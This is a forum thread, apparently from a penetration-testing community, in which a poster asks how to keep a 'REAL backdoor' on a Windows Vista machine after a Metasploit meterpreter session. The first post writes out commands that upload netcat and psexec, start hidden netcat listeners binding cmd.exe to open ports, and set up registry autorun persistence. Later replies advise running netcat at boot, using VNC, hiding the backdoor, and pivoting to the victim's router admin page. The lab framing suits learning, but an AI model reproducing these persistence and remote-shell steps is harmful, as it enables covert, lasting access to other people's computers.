Page 1 of 5 123 ... LastLast
Results 1 to 10 of 45

Thread: Opening backdoor after getting meterpreter session

  1. #1
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default Opening backdoor after getting meterpreter session

    Greeting everybody... Straight to the point, should we?

    OK........ scenario first. In my closed lab environment, I've set up 2 different internet connection with (obviously) different IP addresses:
    Victim's ip is 82.24.180.15, running vista home edition SP1.
    Attacker's ip 82.24.182.14, running BT3, most updated MSF

    I can successfully connect to the vista box by following this exploitation tutorial:
    http://forums.remote-exploit.org/showthread.php?t=19129

    After getting the meterpreter session, I opened 2 backdoors in the vista box for future invasion.

    Code:
    cd c:\
    mkdir xxx
    ls
    cd xxx
    upload /root/nc111nt/nc.exe nc.exe
    upload /root/PsTools/psexec.exe psexec.exe
    execute -f cmd.exe -c -H -i
    psexec.exe \\127.0.0.1 -u username -p password c:\xxx\nc.exe -L -d -e cmd.exe -p 8888
    psexec.exe \\127.0.0.1 -u username -p password c:\xxx\nc.exe -L -d -e cmd.exe -p 9999
    Then I ended the meterpreter session. Previously, I configured (port-forwarding) victim's router to forward port 9999 request to 192.168.1.2 (which is stationary for the vista laptop). I know that this may not be possible in real world.

    Now, from the BT3 box:
    Code:
    nc 82.24.180.15;) 9999 =======> works & gives the command shell
    nc 82.24.180.15;) 8888 =======> does not work
    I can easily understand why the 2nd command is not working, because we didn't ask the router to forward 8888 request to vista box. And, as I mentioned earlier, in the real world I (or the attacker) wouldn't be able to configure the router. OR am I wrong? It's really tough to think that I can access another router without actually connecting to that (unless remote management is enabled by some dumb **s).

    Now, I tried few other things:
    1) Tried "Back Orifice 2000 from sourceforge", but couldn't upload it because of the AV (Avast!, really good). So, I didn't go further. I'm sure that the AV will catch "sub 7" etc etc as well.

    2) Saved the exe file in windows folder & edited remote registry to run it every time the computer restarts. This one works but this is NOT a true backdoor. I will have to switch on my BT3 box first thing in the morning (before the other machine starts) & if I miss it then will have to wait until other one restarts.

    Any ideas, how to open a REAL backdoor? Thanks and if you kindly point me towards further reading/tutorials that would be great. Thanks guys

  2. #2

    Default

    Well, actually, you are able to access the routers setup page either through the routing feature that metasploit has (which enables you to port scan/access other machines on the network, as was stated in my tutorial), or by uploading and installing links for Windows (text based browser, which you could navigate to the routers setup page on). That'll work fine, and just get netcat to start up with the PC every time - that's a reasonable backdoor, and works just fine; does everything you'd need it to

    ~phoenix910

  3. #3
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    @OP:
    You should define what you expect a backdoor from doing.
    As phoenix910 stated a simple NC is already a backdoor. Back Orifice and Sub7 are trojans with all that stupid stuff like ejecting the CD drive and so on. Or you could also install a VNC server instead of or in addition to NC.
    Tiocfaidh ár lá

  4. #4
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by phoenix910 View Post
    Well, actually, you are able to access the routers setup page either through the routing feature that metasploit has (which enables you to port scan/access other machines on the network, as was stated in my tutorial), or by uploading and installing links for Windows (text based browser, which you could navigate to the routers setup page on). That'll work fine, and just get netcat to start up with the PC every time - that's a reasonable backdoor, and works just fine; does everything you'd need it to

    ~phoenix910
    "text based browser" seems to be interesting, I'll have a look....
    and yah, I'm happy to connect via nc, as long as it "connects"...
    Thanks alot

    Quote Originally Posted by KMDave View Post
    @OP:
    Back Orifice and Sub7 are trojans with all that stupid stuff like ejecting the CD drive and so on. Or you could also install a VNC server instead of or in addition to NC.
    I was just trying those because I was unable to use nc.... really I don't want to use those stupid trojans..... there is no charm of using those....

    And I was just wondering - wouldn't be VNC server a little bit "noisy"?
    Thanks

  5. #5
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    And I was just wondering - wouldn't be VNC server a little bit "noisy"?
    And NC isn't

  6. #6
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Depending on how you hide it.

    Sure the issue is that you can only access the machine while it is running. If it is a desktop machine you will have little to no chance to really use VNC as a backdoor.

    That's why I was asking which purpose you want the backdoor to fit. Why is NC no option?
    Tiocfaidh ár lá

  7. #7
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by KMDave View Post
    That's why I was asking which purpose you want the backdoor to fit.
    Now, I'm just learning. However, in the real world I would like to perform this in my work area (after getting permission) to increase peoples awareness about being updated. My main goal is to play around the remote file storage system, company sensitive information stored as doc & pdf files. So, NC is good enough for me.

    Quote Originally Posted by KMDave View Post
    Why is NC no option?
    And I didn't say this.....

  8. #8
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Oh sorry,

    thought that you meant it is not an option to use when you said unable to use
    Tiocfaidh ár lá

  9. #9
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by phoenix910 View Post
    Well, actually, you are able to access the routers setup page either through the routing feature that metasploit has (which enables you to port scan/access other machines on the network, as was stated in my tutorial),.............
    I tried it, although to be honest, the process is not fully clear to me.
    why "Invalid gateway specified"........ "route print" doesn't show anything.
    meterpreter > route

    Network routes
    ==============

    Subnet Netmask Gateway
    ------ ------- -------
    0.0.0.0 0.0.0.0 192.168.1.1
    127.0.0.0 255.0.0.0 127.0.0.1
    127.0.0.1 255.255.255.255 127.0.0.1
    127.255.255.255 255.255.255.255 127.0.0.1
    192.168.1.0 255.255.255.0 192.168.1.2
    192.168.1.2 255.255.255.255 192.168.1.2
    192.168.1.255 255.255.255.255 192.168.1.2
    224.0.0.0 240.0.0.0 127.0.0.1
    224.0.0.0 240.0.0.0 192.168.1.2
    255.255.255.255 255.255.255.255 127.0.0.1
    255.255.255.255 255.255.255.255 192.168.1.2

    meterpreter >
    Background session 3? [y/N]
    msf exploit(handler) > route add 192.168.1.0 255.255.255.0 1
    [-] Invalid gateway specified.
    msf exploit(handler) >
    I know that i'm completely missing something, but i like to learn play while playing.......

    Quote Originally Posted by phoenix910 View Post
    or by uploading and installing links for Windows (text based browser, which you could navigate to the routers setup page on). That'll work fine ..........
    well, so far, I've uploaded the browser files on vista box. Locally, it works fine. But remotely:

    c:\xxx>dir
    dir
    Volume in drive C is OS
    Volume Serial Number is 5684-D9A1

    Directory of c:\xxx

    10/03/2009 20:38 <DIR> .
    10/03/2009 20:38 <DIR> ..
    10/03/2009 20:38 131,462 lynx.cfg
    10/03/2009 20:34 1,161,728 lynx.exe
    05/03/2009 23:13 61,440 nc.exe
    05/03/2009 23:13 234,536 psexec.exe
    4 File(s) 1,589,166 bytes
    2 Dir(s) 107,945,242,624 bytes free

    c:\xxx>lynx.exe yahoo.com
    lynx.exe yahoo.com
    LINES value must be >= 2: got 1
    initscr(): LINES=1 COLS=1: too small.

    c:\xxx>lynx.exe google.com
    lynx.exe google.com
    LINES value must be >= 2: got 1
    initscr(): LINES=1 COLS=1: too small.

    c:\xxx>lynx.exe 192.168.1.1
    lynx.exe 192.168.1.1
    LINES value must be >= 2: got 1
    initscr(): LINES=1 COLS=1: too small.
    Any ideas??

  10. #10

    Default

    I use "links", as opposed to "lynx", but whatever floats your boat Also, as per my tutorial, just execute "links" and make sure you're interacting with the process, then you can tell it to browse to yahoo.com from there.

    ~phoenix910

Page 1 of 5 123 ... LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •